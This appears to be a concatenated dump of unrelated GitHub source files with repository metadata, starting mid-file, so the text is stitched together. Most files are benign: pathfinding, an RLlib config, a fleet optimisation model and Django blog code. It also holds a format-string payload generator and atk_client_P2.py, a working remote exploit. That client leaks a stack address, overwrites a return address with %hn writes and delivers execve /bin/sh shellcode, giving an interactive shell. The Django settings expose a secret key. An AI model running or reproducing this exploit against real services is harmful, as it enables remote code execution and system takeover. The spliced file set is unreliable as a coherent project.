mask_piece = int("FF" * chunk_size, 16)
for target, value in writes:
for offset in offsets:
# Masking and shifting; int is necessary to prevent longs
mask = mask_piece << offset
masked = int((value & mask) >> offset)
byte_writes.append((target + offset/8, masked, chunk_size))
return sorted(byte_writes, key=operator.itemgetter(1))
def pad(byte_offset, word_size=4):
""" Pads the format string
Parameters:
byte_offset: the number of bytes to padd the string
word_size: the word size (in bytes) of the architecture (default: 4)
"""
word_offset = byte_offset / word_size
format_string = "A" * (-byte_offset % word_size)
# The format_string was padded
if format_string:
word_offset += 1
return format_string, word_offset
def format_string(writes, byte_offset, string_size, current_length, debug=False):
""" Builds the whole format string
Parameters:
writes: a list of (target, value, size_in_bytes) tuples to overwrite
byte_offset: the offset in bytes on the stack to the format string
string_size: the size of the format string to generate
current_length: the length of the format string prefix (if there is one)
debug: Debug mode (default: False)
"""
format_start, word_offset = pad(byte_offset)
format_start += "".join(struct.pack("=I", t) for t, _, _ in writes)
format_end = ""
current_length += len(format_start)
modifiers = { 1: "hh", 2: "h", 4: "", 8: "ll" }
for _, v, s in writes:
next_length = (v - current_length) % (256 ** s)
# For 4 and less characters, printing directly is more efficient
# For 5 to 8, the general method can't be used
# Otherwise, use general method
if next_length < 5:
format_end += "A" * next_length
elif next_length < 8:
format_end += "%{:d}hhx".format(next_length)
else:
format_end += "%{:d}x".format(next_length)
current_length += next_length
# TODO: Remove this ugly debug shit
if not debug:
format_end += "%{:d}${:s}n".format(word_offset, modifiers[s])
else:
format_end += "\n%{:d}$08x\n".format(word_offset)
word_offset += 1
# Pad and return the built format string
format_string = format_start + format_end
return format_string + "B" * (string_size - len(format_string))
def format_string_fuckyeah(writes, byte_offset, string_size, printed_count, debug=False):
print 'FuckYeah mode: ON'
return format_string(writes, byte_offset, string_size, printed_count, debug)
def main():
writes = ((0x45397010, 0x01020304),\
(0x45397014, 0x11121314))
chunks = chunk(writes, 4, 2)[0:1] + chunk(writes, 4, 1)[2:]
print format_string(chunks, int(sys.argv[1]), 1024, 0, debug=("t" == sys.argv[2]))
def usage():
print >> sys.stderr, "ze seclab's über format string !"
print >> sys.stderr, " Usage: {} <offset> <t|f>".format(sys.argv[0])
sys.exit(1)
if __name__ == "__main__":
if len(sys.argv) != 3:
usage()
main()
| [
"yans@yancomm.net"
] | yans@yancomm.net |
d9f3e2a32427431101d08fa9c9f5b87972831ce2 | fa5435e2e05b772327e039e3ebe64fe3958ce928 | /test2.py | 754ba3a7f52d3165dd95d2641fc533f89865ac48 | [
"MIT"
] | permissive | gtg3vv/cs3240-labdemo | 435578b6a45888f080797012a7987c8eadb52b7d | 8d49de60cdd5f9dd314da1225959bf95735e174a | refs/heads/master | 2021-06-25T11:42:09.861000 | 2017-09-11T18:16:43 | 2017-09-11T18:16:43 | 103,137,865 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45 | py |
def test2(y):
return y * 2
print(test2(4)) | [
"gtg3vv@virginia.edu"
] | gtg3vv@virginia.edu |
2697bbed846b1c7444c0f17047c060e264ce690a | b6e7a72b66e240e336c193b88ee147f3c384164c | /path.py | fd1c81cbf2090f858c51cd33d7d720d193b05637 | [] | no_license | jhhuang7/Towers | 638e77a7e318713e317bae209911cfc3e5231fa0 | 525de224bae0df306aa8a866119317df6030e8c4 | refs/heads/master | 2022-04-24T06:04:43.676208 | 2020-04-26T00:55:58 | 2020-04-26T00:55:58 | 136,620,455 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,607 | py | """
Path-finding logic for navigating a grid with obstacles
"""
# , ,
# / \/ \
# (/ //_ \_
# .-._ \|| . \
# \ '-._ _,:__.-"/---\_ \
# ______/___ '. .--------------------'~-'--.)__( , )\ \
# `'--.___ _\ / | Here ,' \)|\ `\|
# /_.-' _\ \ _:,_ Be Dragons " || (
# .'__ _.' \'-/,`-~` |/
# '. ___.> /=,| Abandon hope all ye who enter |
# / .-'/_ ) '---------------------------------'
# )' ( /(/
# \\ "
# '=='
from queue import Queue
class Path:
"""A path from a start point to an end point.
Used to generate shortest routes between two points.
Attributes:
start (tuple<int, int>): The starting point
end (tuple<int, int>): The ending point
deltas (dict<tuple<int, int>: tuple<int, int>>): A map of the
best path to follow
"""
def __init__(self, start, end, get_neighbours):
"""Initialize a path from a starting point to a finishing point
Parameters:
start (tuple<int, int>): The starting position
end (tuple<int, int>): The end position
get_neighbours (func<tuple<int, int>>): A function which takes a
position and returns the
neighbours
"""
self.start = start
self.end = end
self.get_neighbours = get_neighbours
self._generate()
def _generate_distance_map(self):
"""Generate a mapping of positions to their distance from the end point
Returns:
dict<tuple<int, int>: int>: the position distance mapping
"""
boundary = Queue()
boundary.put(self.end)
distances = {self.end: 0}
# Generate distance map
while not boundary.empty():
to = boundary.get()
for from_ in self.get_neighbours(to, from_=False):
if from_ not in distances:
boundary.put(from_)
distances[from_] = distances[to] + 1
return distances
def _generate_best_neighbours(self, distances):
"""Calculate the best route based on a distance mapping
Parameters:
distances (dict<tuple<int, int>: int>): A map of positions to
distances from end point
Returns:
dict<tuple<int, int>: tuple<int, int>>: A map of the best path to follow
"""
best_neighbours = {}
# Calculate best neighbours
for from_ in distances:
neighbours_by_distance = []
for to in self.get_neighbours(from_, from_=True):
neighbours_by_distance.append((distances[to], to))
neighbours_by_distance.sort(key=lambda x: x[0])
best_distance = neighbours_by_distance[0][0]
best_deltas = set()
for distance, neighbour in neighbours_by_distance:
if distance == best_distance:
delta = tuple(a - b for a, b in zip(neighbour, from_))
best_deltas.add(delta)
best_neighbours[from_] = best_deltas
del best_neighbours[self.end]
return best_neighbours
def _generate(self):
"""Calculate the best path to travel through the path"""
distances = self._generate_distance_map()
# ensure the start point can be reached from the end point
if self.start not in distances:
raise KeyError("Cannot reach end from start")
self.deltas = self._generate_best_neighbours(distances)
# overwrite bests on path
best_path = list(self.get_best_path())
best_path[-1] = best_path[-1][0], best_path[-2][1]
# for cell in self.deltas:
# self.deltas[cell] = {self.deltas[cell].pop()}
for best, delta in best_path:
self.deltas[best] = {delta}
def get_best_path(self):
"""Yields (position, delta) pairs on best path, from start to end
Yield:
(position, delta) pair:
- position (tuple<int, int>): (column, row) position of point on the path
- delta (tuple<int, int>): change in (column, row) position to reach next point on path,
else None iff delta == end
"""
best = self.start
for delta in self.get_best_deltas():
yield best, delta
best = tuple(a + b for a, b in zip(best, delta))
yield best, None
def get_best_deltas(self):
"""Yield the best path to travel from start to finish
Yields:
tuple<int, int>: The best sequence of positions to reach the end
"""
best = self.start
previous = None
while best != self.end:
delta = self.get_best_delta(best, previous=previous)
yield delta
previous = delta
best = tuple(a + b for a, b in zip(best, delta))
def get_shortest(self):
"""Yield the best path to travel from start to finish
Yields:
tuple<int, int>: The best sequence of positions to reach the end
"""
for best, delta in self.get_best_path():
yield best
if delta is None:
break
def get_best_delta(self, cell, previous=None):
"""(tuple<int, int>) Returns change in (column, row) position to reach next point on path
Parameters:
cell (tuple<int, int>): Current point on the path
previous (tuple<int, int>): Previous point on the path
"""
if previous and previous in self.deltas[cell]:
return previous
return next(iter(self.deltas[cell]))
def get_sources(self, destination):
"""Yields the cell(s) that flow into destination
Parameters:
destination (tuple<int, int>): The destination cell
"""
for source, deltas in self.deltas.items():
for delta in deltas:
next_ = tuple(a + b for a, b in zip(source, delta))
if next_ == destination:
yield source
| [
"juhua.huang@uqconnect.edu.au"
] | juhua.huang@uqconnect.edu.au |
bfe75d02e6cd857f3e4b89d4af9a5c63c92efcb1 | 24e3418c5814ba30ecffd4ca7ad8253f1dd7d414 | /rllib/contrib/bandits/agents/lin_ts.py | e7117bd0af3dba7856304eeeb94d09ed784765ee | [
"Apache-2.0",
"MIT"
] | permissive | GoingMyWay/ray | ecd7aaec0ab888b43020e5410e9da51cc44a66dd | 4fb195a22e972a0b54359ffa58afedb35e827540 | refs/heads/master | 2021-04-13T08:56:11.414281 | 2020-05-27T04:42:23 | 2020-05-27T04:42:23 | 267,219,626 | 1 | 0 | Apache-2.0 | 2020-05-27T04:22:26 | 2020-05-27T04:22:26 | null | UTF-8 | Python | false | false | 1,011 | py | import logging
from ray.rllib.agents.trainer import with_common_config
from ray.rllib.agents.trainer_template import build_trainer
from ray.rllib.contrib.bandits.agents.policy import BanditPolicy
logger = logging.getLogger(__name__)
# yapf: disable
# __sphinx_doc_begin__
TS_CONFIG = with_common_config({
# No remote workers by default.
"num_workers": 0,
"use_pytorch": True,
# Do online learning one step at a time.
"rollout_fragment_length": 1,
"train_batch_size": 1,
# Bandits cant afford to do one timestep per iteration as it is extremely
# slow because of metrics collection overhead. This setting means that the
# agent will be trained for 100 times in one iteration of Rllib
"timesteps_per_iteration": 100,
"exploration_config": {
"type": "ray.rllib.contrib.bandits.exploration.ThompsonSampling"
}
})
# __sphinx_doc_end__
# yapf: enable
LinTSTrainer = build_trainer(
name="LinTS", default_config=TS_CONFIG, default_policy=BanditPolicy)
| [
"noreply@github.com"
] | GoingMyWay.noreply@github.com |
a79640d7e334ac158cb26699d645aac5f110d913 | 932b875ba779a8a45443dfc909810f7f16ab4ac3 | /atk_client_P2.py | a72369c4903b66cd7d0d297c73589246176b9c1a | [] | no_license | ryandsowers/FormatString | 66ac996c5b034266f6b228fdd483bee4c13bd712 | fcfc1adeb3dfd64fc2ca6777fc36cf421b18896b | refs/heads/master | 2020-04-06T07:40:25.760964 | 2018-11-12T21:46:11 | 2018-11-12T21:46:11 | 157,281,057 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,417 | py | #
# Works with Python2
#
# Modified by: Ryan Sowers
# 06/04/2018
#
# Run: python atk_client_P2.py IP Port
#
import socket
import sys
import telnetlib
import time
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if len(sys.argv) < 3:
print "Please provide <hostname> <port number>"
exit(1)
# Connect the socket to the port on the server given by the caller
# server_address = (sys.argv[1], sys.argv[2]) # socket id
print "connecting to " + sys.argv[1] + " port " + sys.argv[2]
sock.connect((sys.argv[1], int(sys.argv[2]))) # connect to socket
tn = telnetlib.Telnet()
tn.sock = sock
# try:
data = sock.recv(1024)
print data.decode() # 200 OK ECHO (v0.2)
# while True:
# string = raw_input()
# string = string +'\n'
# print "Sending: %s" % string
# sock.sendall(string) # send string
# print "String sent!"
pload1 = '%1$p\n'
print "Sending: %s" % pload1
sock.send(pload1) # send string
# print "String sent!"
time.sleep(1)
data = sock.recv(1024)
print "Buffer start: " + data.decode()
# Calculate new return address
return_addr = int(data, 16)
return_addr = return_addr + 97 # updated with odd address offset
return_addr = hex(return_addr)
return_addr = str(return_addr)
print "Return addr to place: " + return_addr
# List of converted hex values to decimal
dec_addr_list = []
address_end = return_addr[-4:]
# print "Address end: " + address_end
dec_addr_end = int(address_end, 16)
# print "Dec conversion is: " + str(dec_addr_end)
address_mid = return_addr[6:10]
# print "Address middle: " + address_mid
dec_addr_mid = int(address_mid, 16)
# print "Dec conversion is: " + str(dec_addr_mid)
address_beg = return_addr[2:6]
# print "Address beginning: " + address_beg
dec_addr_beg = int(address_beg, 16)
# print "Dec conversion is: " + str(dec_addr_beg)
# sort address values by size
dec_addr_list.append((dec_addr_beg, 13))
dec_addr_list.append((dec_addr_mid, 14))
dec_addr_list.append((dec_addr_end, 15))
# print "Dec addr list: "
# print dec_addr_list
dec_addr_list.sort(key=lambda tup: tup[0])
# print "Sorted dec addr list: "
# print dec_addr_list
# Calculate size differences of values
updated_addr_list = []
updated_addr_list.append(dec_addr_list[0])
updated_addr_list.append((dec_addr_list[1][0] - dec_addr_list[0][0], dec_addr_list[1][1]))
updated_addr_list.append((dec_addr_list[2][0] - dec_addr_list[1][0], dec_addr_list[2][1]))
print "Updated addr list: "
print updated_addr_list
# Calculate location to place return address
return_placement = int(data, 16)
print_addr1 = return_placement + 284
print_addr1 = hex(print_addr1)
print_addr1 = str(print_addr1)
print "Place return address here: " + print_addr1
# print "Length: " + str(len(print_addr1))
# print "Convert this: " + print_addr1[2:]
# Zero fill addresses to 8 bytes
if len(print_addr1) < 18:
print_addr1 = print_addr1[:2] + "0"*(18-len(print_addr1)) + print_addr1[2:]
print_addr1 = print_addr1[:2]+print_addr1[16:]+print_addr1[14:16]+print_addr1[12:14]+print_addr1[10:12]+print_addr1[8:10]+print_addr1[6:8]+print_addr1[4:6]+print_addr1[2:4]
# print "...New: " + print_addr1
ASCIIaddr1 = bytearray.fromhex(print_addr1[2:])
# return_placement = int(data, 16)
print_addr2 = return_placement + 282
print_addr2 = hex(print_addr2)
print_addr2 = str(print_addr2)
# print "...here: " + print_addr2
if len(print_addr2) < 18:
print_addr2 = print_addr2[:2] + "0"*(18-len(print_addr2)) + print_addr2[2:]
print_addr2 = print_addr2[:2]+print_addr2[16:]+print_addr2[14:16]+print_addr2[12:14]+print_addr2[10:12]+print_addr2[8:10]+print_addr2[6:8]+print_addr2[4:6]+print_addr2[2:4]
# print "...New: " + print_addr2
ASCIIaddr2 = bytearray.fromhex(print_addr2[2:])
# return_placement = int(data, 16)
print_addr3 = return_placement + 280
print_addr3 = hex(print_addr3)
print_addr3 = str(print_addr3)
# print "...and here: " + print_addr3
if len(print_addr3) < 18:
print_addr3 = print_addr3[:2] + "0"*(18-len(print_addr3)) + print_addr3[2:]
print_addr3 = print_addr3[:2]+print_addr3[16:]+print_addr3[14:16]+print_addr3[12:14]+print_addr3[10:12]+print_addr3[8:10]+print_addr3[6:8]+print_addr3[4:6]+print_addr3[2:4]
# print "...New: " + print_addr3
ASCIIaddr3 = bytearray.fromhex(print_addr3[2:])
# Shellcode source:
# ;Category: Shellcode
# ;Title: GNU/Linux x86_64 - execve /bin/sh
# ;Author: m4n3dw0lf
# ;Github: https://github.com/m4n3dw0lf
# ;Date: 14/06/2017
# ;Architecture: Linux x86_64
# https://www.exploit-db.com/exploits/42179/
# starting with example for buffer start at 0x7fffffffec50
payload = "%" + str(updated_addr_list[0][0]).zfill(5) + "c%" + str(updated_addr_list[0][1]) \
+ "$hn%" + str(updated_addr_list[1][0]).zfill(5) + "c%" + str(updated_addr_list[1][1]) + \
"$hn%" + str(updated_addr_list[2][0]).zfill(5) + "c%" + str(updated_addr_list[2][1]) + "$hn" \
+ "A" + str(ASCIIaddr1) + str(ASCIIaddr2) + str(ASCIIaddr3) + "\x90"*64 + \
"\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05\n"
print payload
# string = raw_input()
# string = string +'\n'
# # print "Sending: %s" % string
# sock.sendall(string) # send string
# # print "String sent!"
# data = sock.recv(1024)
# print data.decode()
# # print "Response: %s" % data.decode() # receive response
sock.send(payload)
time.sleep(1)
sock.send("quit\n")
# data = sock.recv(1024)
# print data.decode()
# time.sleep(1)
tn.interact()
| [
"noreply@github.com"
] | ryandsowers.noreply@github.com |
5f0d17422cc3b27b56b10e55530f53bf4a807cd8 | 5ec39b8559af4d88b1c3d9a7bd1eacd3d2ac63d3 | /Problem32.py | 4655e406865a6f826733e49062eb6b1204c059d8 | [] | no_license | vinxavier/metodosdeotimizacao | 71e8247e77ebd61b54a7f03233ab6ddf6a42e1cf | 9b827b567bea9f2005770e399061b4abb0ec3bf3 | refs/heads/master | 2020-06-14T18:22:30.684738 | 2019-08-26T21:08:12 | 2019-08-26T21:08:12 | 195,085,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,023 | py | from ortools.linear_solver import pywraplp
MAX_CUSTO = 250000
MAX_MANUTENCAO = 50000
MAX_VEICULOS = 8
custos = [26000, 30000, 24000, 32000, 50000, 60000]
capacidade = [7,8,9,11,20,24]
manutencao = [5000, 3500, 6000, 8000, 7000, 110000]
labels = ["Nissan Van", "Toyota Van", "Plymouth Van", "Ford(Stretch) Van",
"Mitsubishi Minibus","General Motors Minibus"]
p = pywraplp.Solver("", pywraplp.Solver.CBC_MIXED_INTEGER_PROGRAMMING)
infinity = p.infinity()
x = [p.IntVar(0, infinity, labels[i]) for i in range(6)]
p.Add(p.Sum([x[i]*custos[i] for i in range(6)])<=MAX_CUSTO)
p.Add(p.Sum([x[i]*manutencao[i] for i in range(6)])<=MAX_MANUTENCAO)
p.Add(p.Sum([x[i] for i in range(6)])<=MAX_VEICULOS)
p.Add(x[4]+x[5]>=1)
p.Add(x[0]+x[1]+x[2]+x[3]>=3)
p.Add(x[2]+x[3]+x[5] - 0.5 * p.Sum([x[i] for i in range(6)])>=0)
p.Maximize(p.Sum([x[i]*capacidade[i] for i in range(6)]))
p.Solve()
for i in range(6):
print("Número de ", x[i]," = ",x[i].solution_value())
print("Total de assentos:", p.Objective().Value())
| [
"vsxavier@live.com"
] | vsxavier@live.com |
015fd34248887879e5b092b00ab71bd4a61b4d02 | 8a9ba5e9e8c9f3d8e05b6840f1c17d526344e6d2 | /src/reia.py | 7ada168207031f9a5c85d73b90325662fbde0a50 | [
"MIT"
] | permissive | maanavshah/remote-intelligent-assistant | fe1e2bcb6d43345553194c442d4676b3137e0348 | 65ea7287d0ca2dd98a376bbadc81a5093b9b6046 | refs/heads/master | 2021-06-13T20:20:05.622634 | 2019-12-20T12:54:00 | 2019-12-20T12:54:00 | 142,580,543 | 4 | 0 | MIT | 2021-03-25T21:58:30 | 2018-07-27T13:27:56 | Python | UTF-8 | Python | false | false | 5,369 | py | import yaml
import sys
import random
import nltk
import operator
import jellyfish as jf
import json
import requests
import os
import time
import signal
import subprocess
from nltk.tag import StanfordPOSTagger
from textblob.classifiers import NaiveBayesClassifier
from execute import construct_command
from feedback import get_user_feedback
import numpy as np
from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.svm import LinearSVC
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.multiclass import OneVsRestClassifier
from sklearn import preprocessing
def signal_handler(signal, frame):
print ('Thank You!')
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
my_path = os.path.abspath(os.path.dirname(__file__))
CONFIG_PATH = os.path.join(my_path, "../config/config.yml")
MAPPING_PATH = os.path.join(my_path, "../data/mapping.json")
TRAINDATA_PATH = os.path.join(my_path, "../data/traindata.txt")
LABEL_PATH = os.path.join(my_path, "../data/")
sys.path.insert(0, LABEL_PATH)
import trainlabel
with open(CONFIG_PATH,"r") as config_file:
config = yaml.load(config_file)
os.environ['STANFORD_MODELS'] = config['tagger']['path_to_models']
exec_command = config['preferences']['execute']
def get_username(user_id):
payload = {'token': config['slack']['slack_token'], 'user': user_id}
r = requests.post(config['slack']['user_info'], params=payload)
return r.json()['user']['name']
def read_message():
payload = {'token': config['slack']['slack_token'], 'channel': config['slack']['channel'] , 'count': '1'}
r = requests.get(config['slack']['get_url'], params=payload)
message = r.json()['messages'][0]['text']
ts = r.json()['messages'][0]['ts']
data = r.json()['messages'][0]
if 'user' not in data:
user = r.json()['messages'][0]['username']
else:
user = r.json()['messages'][0]['user']
return(message,ts,user)
def post_message(message):
payload = {'token': config['slack']['slack_token'], 'channel': config['slack']['channel'] , 'text': message, 'username':config['slack']['username']}
r = requests.post(config['slack']['post_url'], params=payload)
return r
def classify(text):
X_train = np.array([line.rstrip('\n') for line in open(TRAINDATA_PATH)])
y_train_text = trainlabel.y_train_text
X_test = np.array([text])
target_names = ['file', 'folder', 'network', 'system', 'general']
lb = preprocessing.MultiLabelBinarizer()
Y = lb.fit_transform(y_train_text)
classifier = Pipeline([
('vectorizer', CountVectorizer()),
('tfidf', TfidfTransformer()),
('clf', OneVsRestClassifier(LinearSVC()))])
classifier.fit(X_train, Y)
predicted = classifier.predict(X_test)
all_labels = lb.inverse_transform(predicted)
for item, labels in zip(X_test, all_labels):
return (', '.join(labels))
def suggestions(suggest_list):
suggest = (sorted(suggest_list,reverse=True)[:5])
return suggest
def consume_message():
cmd = "sed -i -e \"1d\" /home/maanav/REIA/mqueue.txt"
proc = subprocess.Popen([cmd], stdout=subprocess.PIPE, shell=True)
(out, err) = proc.communicate()
def call_reia():
while(True):
max_score = 0.1
map_val = ""
with open('/home/maanav/REIA/mqueue.txt', 'r') as f:
first_line = f.readline()
while first_line == "":
time.sleep(1)
call_reia()
print('-----------------------')
user_input = first_line.split(' ', 1)[1]
user_name = get_username(first_line.split(' ', 1)[0])
suggest_list = []
suggest_message = ""
#prev_ts = ts
print("\nINPUT = ")
print(user_input)
label = classify(user_input)
if label == "":
# post_message("Sorry, I could not understand. Please rephrase and try again.")
with open("/home/maanav/REIA/src/user.txt", "a") as output_file:
output_file.write("Incorrectly mapped ::User-Input = " + user_input)
consume_message()
continue
print("Classified as : "+str(label))
tokens = nltk.word_tokenize(user_input)
print(tokens)
st = StanfordPOSTagger(config['tagger']['model'],path_to_jar=config['tagger']['path'])
stanford_tag = st.tag(user_input.split())
print("Tags")
print(stanford_tag)
with open(MAPPING_PATH,'r') as data_file:
data = json.load(data_file)
for i in data[label]:
dist = jf.jaro_distance(str(user_input),str(i))
suggest_list.append(tuple((dist,i)))
print(dist)
if(dist > max_score):
max_score = dist
map_val = i
if max_score < config['preferences']['similarity_threshold']:
# post_message("Sorry, I could not understand. Please rephrase and try again.")
with open("/home/maanav/REIA/src/user.txt", "a") as output_file:
output_file.write("Incorrectly mapped ::User-Input = " + user_input)
consume_message()
continue
if config['preferences']['suggestions'] == True:
suggest = suggestions(suggest_list)
post_message("Did you mean :")
for i in suggest:
suggest_message += (str(i[1])+"\n")
post_message(suggest_message)
continue
print("\nMapped to : "+map_val)
with open("/home/maanav/REIA/src/user.txt", "a") as output_file:
output_file.write("correctly mapped to : " + map_val + " User-Input = " + user_input)
#post_message(map_val)
construct_command(user_input,label,tokens,map_val,stanford_tag,exec_command,user_name)
#call('sed -i -e "1d " REIA/mqueue.txt')
consume_message()
#print(response)
print("Starting...")
call_reia()
| [
"shah.maanav.07@gmail.com"
] | shah.maanav.07@gmail.com |
13c40060e5b65b6df1506e61896e3e1f011a39ea | 25a6d71c25c1c808a72f484bf568d41c1d455b2f | /Program13.py | 5d2594b3ae28011ec74a3d5d9c9cab8e57df2261 | [] | no_license | DreamITJob/Top-35-Medium-Level-Python-programs | 4045a8feeb30c56c142cf5b629b23e1a7671e8d3 | ca91a82d901b218fb359875affb74fe6c0c5b734 | refs/heads/master | 2020-06-02T08:33:10.590476 | 2019-07-12T13:10:36 | 2019-07-12T13:10:36 | 191,100,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 719 | py | #Python program for swapping of variables...
def swap1(x,y):
print("1st swap function: ")
x,y=y,x
print("first number: ",x)
print("second number: ",y)
def swap2(x,y):
print("2nd swap function: ")
x=x+y
y=x-y
x=x-y
print("first number: ",x)
print("second number: ",y)
def swap3(x,y):
print("3rd swap function: ")
x=x^y
y=x^y
x=x^y
print("first number: ",x)
print("second number: ",y)
def swap4(x,y):
print("4th swap function: ")
x=x*y
y=x//y
x=x//y
print("first number: ",x)
print("second number: ",y)
x=int(input("Enter first number: "))
y= int(input("Enter second number : "))
swap1(x,y)
swap2(x,y)
swap3(x,y)
swap4(x,y)
| [
"noreply@github.com"
] | DreamITJob.noreply@github.com |
18071d30d283c766360748f5352421075c2b4206 | 128a0343dc88700eb3243a1e7138416a18b9c4a3 | /financialTrack/financialTrack/wsgi.py | 10b754ac005a93a1f18e5b30f9e2233fe6709c7a | [] | no_license | wandss/personalFinances | d9d5a13ac3ccb30de0809bdb3f933552d191bcfc | 7297cccdcc4b83df03f7379bd3b6de2047ed3dd6 | refs/heads/master | 2022-12-12T21:53:26.691181 | 2019-02-12T00:57:51 | 2019-02-12T00:57:51 | 98,544,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | """
WSGI config for financialTrack project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "financialTrack.settings")
application = get_wsgi_application()
| [
"wandss@gmail.com"
] | wandss@gmail.com |
e31667b4ec577f4cfd9f836a00c3146187cb1e51 | 287527cf1f9ffbca9016dc558e64392a9db4ed63 | /nginx/molecule/default/tests/test_default.py | 9d399b74550875e59b2ed49ccfe85dc1abd239c0 | [
"MIT"
] | permissive | midacts/ansibe-molecule-nginx | d8564f9220aa5bb1ba2b35c38e6b4c04e03bd84c | f002d8b2cbc9111367a9cfa6c3dc6099c6d75d41 | refs/heads/master | 2020-04-25T07:42:47.263893 | 2019-02-26T03:06:17 | 2019-02-26T03:06:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 554 | py | import os
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
def test_hosts_file(host):
f = host.file('/etc/hosts')
assert f.exists
assert f.user == 'root'
assert f.group == 'root'
def test_nginx_is_installed(host):
assert host.package('nginx').is_installed
def test_nginx_is_running(host):
assert host.service('nginx').is_running
def test_nginx_is_enabled(host):
assert host.service('nginx').is_enabled
| [
"midactsmystery@gmail.com"
] | midactsmystery@gmail.com |
5b12aa37e4fb1e02bcac1201734492cfd9237ee3 | 4774757f23003c42e1a233c9b01769e30c5a5d13 | /mysite/blog/templatetags/blog_tags.py | 9b8fcc32759de85b4ff83e2db6866cf057205bd9 | [
"MIT"
] | permissive | kformanowicz/django-blog | c1f452e5f8b451af9383d7d18443c0427d88c866 | 1cc2cbf9b3bb5dc797f94e84227ef64457ff2d95 | refs/heads/master | 2020-03-16T12:18:38.425931 | 2018-09-02T18:25:54 | 2018-09-02T18:25:54 | 132,663,909 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 727 | py | from django import template
from django.db.models import Count
from django.utils.safestring import mark_safe
from ..models import Post
import markdown
register = template.Library()
@register.simple_tag
def total_posts():
return Post.published.count()
@register.inclusion_tag('blog/post/latest_posts.html')
def show_latest_posts(count=5):
latest_posts = Post.published.order_by('-publish')[:count]
return {'latest_posts': latest_posts}
@register.simple_tag
def get_most_commented_posts(count=5):
return Post.published.annotate(total_comments=Count('comments')).order_by('-total_comments')[:count]
@register.filter(name='markdown')
def markdown_format(text):
return mark_safe(markdown.markdown(text))
| [
"formanowicz.k@gmail.com"
] | formanowicz.k@gmail.com |
e3445c3b28ca5e82a27ac440ccba698b69daf57d | 0e2716fa989661ec03dd817bf47f33eb9c6c1011 | /normalize.py | 264e1c38edf7f9a3f1eb616cc37f67788de1f478 | [] | no_license | lpbirdueng/myApps | 27222faa3b538bc4e5fef3a03e03d1fc037808f8 | 63c608a8d9125a3f5587dd5c885207a1df31671f | refs/heads/master | 2021-01-19T10:52:00.437327 | 2017-05-17T09:05:24 | 2017-05-17T09:05:24 | 87,903,972 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 162 | py |
def normalize(name):
norm_words = name[0].upper() + name[1:].lower()
return norm_words
L1 = ['adam','LiSA','barT']
L2 = list(map(normalize,L1))
print(L2) | [
"lupeng0924@sina.com"
] | lupeng0924@sina.com |
3b4a2003180e91fe0fb07b7bdd754aecae30eddf | a1f36fe7872dc5e878d0fbc62043bb9db3e51acd | /mysite/settings.py | dd722fdf87cc09280600c5e1c9cf35de492fdb88 | [] | no_license | SusanaLJ/my-blog | 66e29c3041e46bcf08f6d57c2f6f664efef221de | 2bfc41bdcc0996d989f18c3cf78a4eb0df818ea1 | refs/heads/master | 2020-03-30T23:13:18.183845 | 2018-10-05T14:48:37 | 2018-10-05T14:48:37 | 151,694,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,217 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.0.9.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '$eo@l2+z(h)m7-lvt_mn^&d+vgtb4)ny*$!0#jdo-3%h%)0hf-'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', '.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
